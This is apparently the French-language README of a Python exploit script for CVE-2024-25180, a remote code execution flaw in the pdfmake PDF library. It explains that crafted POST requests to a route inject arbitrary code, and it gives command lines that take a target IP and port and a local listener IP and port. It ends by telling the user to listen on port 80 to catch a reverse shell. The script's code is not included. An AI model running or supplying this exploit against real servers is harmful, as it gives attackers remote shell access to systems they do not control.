
Script d'exploitation Python pour CVE-2024-25180, une vulnérabilité d'exécution de code à distance dans pdfmake, délivrant un reverse shell via des requêtes POST spécialement conçues.
pdfmake est une bibliothèque de génération de PDF en JavaScript pur, côté client/serveur. Les versions concernées de ce paquet sont vulnérables à une injection de code arbitraire : un attaquant peut exécuter du code/PDF arbitraire en envoyant une requête POST spécialement conçue à une route. Un attaquant peut exécuter du code arbitraire sur le système en envoyant une requête spécialement conçue.
CVE-2024-25180 Exécution de code à distance dans pdfmake
python3 CVE-2024-25180.py <TARGET_IP> <TARGET_PORT> <LOCAL_IP> <LOCAL_PORT>
python3 CVE-2024-25180.py 192.168.140.42 1234 192.168.45.208 80
Écoutez sur le port 80 pour obtenir un reverse shell.
